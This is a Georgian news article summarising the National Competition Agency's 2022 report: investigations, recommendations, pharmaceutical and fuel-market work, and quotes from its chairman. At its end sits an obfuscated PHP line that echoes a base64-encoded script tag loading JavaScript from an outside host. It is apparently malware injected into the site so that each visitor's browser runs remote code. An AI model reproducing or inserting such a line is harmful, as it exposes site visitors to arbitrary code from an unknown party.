celsiusi
ავერსი შნაიდერი

კონკურენციის ეროვნულმა სააგენტომ 2022 წლის ანგარიში გამოაქვეყნა. ანგარიშის მიხედვით, 2022 წელს, სამი მოკვლევა დასრულდა, ხოლო ორ საქმეზე დაუშვებლობის გადაწყვეტილება იქნა მიღებული. დასრულდა სამი ბაზრის მონიტორინგი, დაიწყო ორი ახალი ბაზრის შესწავლა. უწყების მიერ გაცემულ იქნა 17 რეკომენდაცია: ერთი – საწვავის ბაზარზე; ორი – ჰოსპიტალურ სექტორში ოჯახის ექიმის მომსახურების ფარგლებში; 13 – ფარმაციის ბაზრის შესწავლის პროცესში და ერთი – მთარგმნელობით-სათარჯიმნო მომსახურების სექტორში.

ამავე პერიოდში, ექვს კონცენტრაციაზე გაიცა თანხმობა. 2022 წელს, მომხმარებლის უფლებების დაცვის სექტორში დაიწყო 47 საქმის შესწავლა, ხოლო 4 საქმეზე პირობითი ვალდებულების ხელშეკრულება გაფორმდა. 2014-2022 წლებში, განხორციელებული აქტივობების სურათი კი შემდეგია: დასრულდა 40 მოკვლევა და 11 ბაზრის მონიტორინგი. გაიცა – 23 თანხმობა ეკონომიკური აგენტების კონცენტრაციის შესახებ და კონკურენტული გარემოს გაუმჯობესების მიზნით 88 რეკომენდაცია.

„კონკურენციის ეროვნული სააგენტო 2023 წელს უფრო ძლიერი აღსრულების პოლიტიკით აღჭურვილი და ახალი ფუნქციებით ხვდება! 2022 წელი ჩვენი უწყებისთვის ტრადიციულზე უფრო აქტიური და სიახლეებით დატვირთული იყო. ძალაში შევიდა მომხმარებელთა უფლებების დაცვის შესახებ კანონი და პირველი ნოემბრიდან აღსრულების პროცესი დავიწყეთ და პირველი წარმატებული ნაბიჯებიც გადაიდგა. 2023-ში ჩვენი ერთ-ერთი მთავარი გამოწვევა სწორედ მომხმარებელთა უფლებების დაცვის მაღალი სტანდარტის უზრუნველყოფა იქნება.

საქართველოს პრემიერ-მინისტრის მხარდაჭერით, ჯანდაცვის სამინისტროს მიერ უკვე დანერგილია: ელექტრონული და გენერიკული რეცეპტები, ხარისხის სტანდარტები, რეფერენტული ფასები და ა.შ. დაშვებულ იქნა მედიკამენტების პარალელური იმპორტი თურქეთის რესპუბლიკიდან, რომლის შედეგადაც, დაახლოებით, 50-70%-იანი ფასების შემცირება დაფიქსირდა. რეფორმები გრძელდება, რათა თითოეულმა მომხმარებელმა მედიკამენტების სამართლიან და კონკურენტულ ფასად შეძენა შეძლოს.

2022 წლის პირველი ნახევარი ნავთობზე მაღალი ფასებით გამოირჩეოდა, რამაც ნავთობიმპორტიორი ქვეყნების ეკონომიკაზე და ინფლაციაზე მნიშვნელოვანი გავლენა მოახდინა. კონკურენციის ეროვნული სააგენტოს მონიტორინგმა ბაზარზე მთავარი კომპანიების განსხვავებული ქცევა და საკმარისი საფუძვლები აჩვენა, რომ საქართველოში მოქმედი ხუთი საწვავის რეალიზატორი კომპანიის მიმართ მოკვლევა დაწყებულიყო.

საანგარიშო პერიოდში, დავხურეთ სამი მოკვლევა – დომინანტური მდგომარეობის ბოროტად გამოყენების, არაკეთილსინდისიერი კონკურენციის და შეთანხმებული ქმედების ფაქტებზე“, – განაცხადა ლექვინაძემ.

მისივე თქმით, 2022 წელს, სააგენტომ საფინანსო სექტორისთვის ძალიან აქტუალური თემის მონიტორინგი დაიწყო, რაც გულისხმობს საბანკო პროდუქტების რეალიზაციისას სადაზღვევო პროდუქტების მიწოდება/შეთავაზების ბაზრის შეფასებას.

„სადაზღვევო ბაზარი რეფორმების მოლოდინშია და, ვფიქრობ, ჩვენი უწყების მიერ მომზადებული შეფასება და რეკომენდაციები მის წარმატებულ განხორციელებას ხელს შეუწყობს.

2022 წლის 16-17 ნოემბერს, კოლეგა მარეგულირებელი უწყებების ორგანიზებით, კონკურენციის და მომხმარებელთა უფლებების შესახებ, საქართველოში პირველი საერთაშორისო კონფერენცია გაიმართა. თბილისს სტუმრობდნენ 20-მდე ქვეყნის კოლეგა უწყებების ხელმძღვანელი პირი, გაიმართა ექვსი პანელური სესია, რომელშიც 40-ზე მეტი საერთაშორისო და ადგილობრივი სპიკერი იღებდა მონაწილეობას. მათ შორის, UNCTAD-ის და OECD-ის კონკურენციის და მომხმარებელთა უფლებების მიმართულებების პირველი პირები. ჩვენი მიზანია, კონკურენციის და მომხმარებელთა უფლებების თემაზე გამართული საერთაშორისო ღონისძიებების რუკაზე საქართველო აქტიურად იყოს წარმოდგენილი.

2022 წელს, სააგენტოში ევროკავშირის მხარდაჭერით TWINNING-ის პროექტი დაიწყო. აქტიურია თანამშრომლობა აშშ განვითარების სააგენტოსთან (USAID), რომელთა მხარდაჭერით არაერთი წარმატებული პროექტი ხორციელდება,“ – განმარტავს კონკურენციის ეროვნული სააგენტოს თავმჯდომარე ირაკლი ლექვინაძე.

ვრცლად ანგარიშის ნახვა შესაძლებელია შესაბამის ბმულზე

281
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");